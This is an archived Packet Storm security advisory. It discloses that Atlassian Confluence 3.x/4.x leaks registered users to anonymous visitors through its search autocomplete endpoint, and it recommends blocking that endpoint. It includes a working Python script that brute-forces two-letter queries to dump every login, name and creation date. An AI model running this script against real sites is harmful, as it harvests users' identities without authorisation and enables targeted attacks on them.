what you don't know can hurt you

Atlassian Confluence 3.x / 4.x Information Disclosure

Atlassian Confluence 3.x / 4.x Information Disclosure
Posted Aug 27, 2013
Authored by majinboo

Atlassian Confluence versions 3.x and 4.x allow for anonymous users to list all registered users of the system. The vendor does not believe this is a security concern.

tags | exploit, info disclosure
MD5 | 428d64445ef697372746306caa3d478b

Atlassian Confluence 3.x / 4.x Information Disclosure

Change Mirror Download
Hello list,

Since vendor does not seem to care about this issue more than a year
after initial report (https://jira.atlassian.com/browse/CONF-23985), I
think that is time to share this issue.

-------------------------
Affected products:
-------------------------

Atlassian Confluence 3.x and 4.x (including hosted versions on Atlassian
Cloud)


-------------------------
Details:
-------------------------

WASC-13 - Information Leakage :

When using search engine on
"http(s)://confluence-installation/dosearchsite.action" any user can
list wiki registered users via the "BY :" section of the form.

If user has no access to registered user profile (for instance anonymous
user), information about the user are still displayed on quick search
autocomplete via the '/rest/prototype/1/search/user.json?' URI . Eeven
if 'View User Profiles' is disabled in Confluence Admin > Global
Permissions > Anonymous Access, informations are still leaked.


WASC-21 - Insufficient Anti-automation :

Quick search autocomplete is performed via a javascript call without any
token verification or anti-bruteforce protection. Since only two
characters are needed, it is really easy to bruteforce all registered users.


-------------------------
Mitigation:
-------------------------

Vendor does not provide any patch and privacy options on Confluence
admin is not helping mitigating this issue.

In order to mitigate exploitation of this issue for on-premise
installations, best solution should be to deny access to
'/rest/prototype/1/search/user.json?' to untrusted networks like
Internet. Users of hosted versions on Atlassian Cloud are left without
any solutions at the moment.

-------------------------
Proof of concept:
-------------------------

The following python code will list all registered users of a Confluence
installation :

#!/usr/bin/env python
import httplib, json, sys, re

if (re.search("^https://", sys.argv[1].lower()) == None):
httpconnection = httplib.HTTPConnection(re.split("^http://",
sys.argv[1].lower())[1])
else:
httpconnection = httplib.HTTPSConnection(re.split("^https://",
sys.argv[1].lower())[1])

for i in map(chr, range(97, 123)):
for j in map(chr, range(97, 123)):
httpconnection.request('GET',
'/rest/prototype/1/search/user.json?query=' + i + j)
results = json.loads(httpconnection.getresponse().read())
for k in range(0,results['totalSize']):
try:
username = results['result'][k]['username']
except:
username = None
try:
title = results['result'][k]['title']
except:
title = None
try:
date =
results['result'][k]['createdDate']['friendly']
except:
date = None
if (username != None):
try:
print "login:%s - name:%s -
creation_date:%s" % (username,title,date)
except:
pass


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2015

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    2 Files
  • 2
    Feb 2nd
    17 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    16 Files
  • 5
    Feb 5th
    14 Files
  • 6
    Feb 6th
    4 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2015 Packet Storm. All rights reserved.

close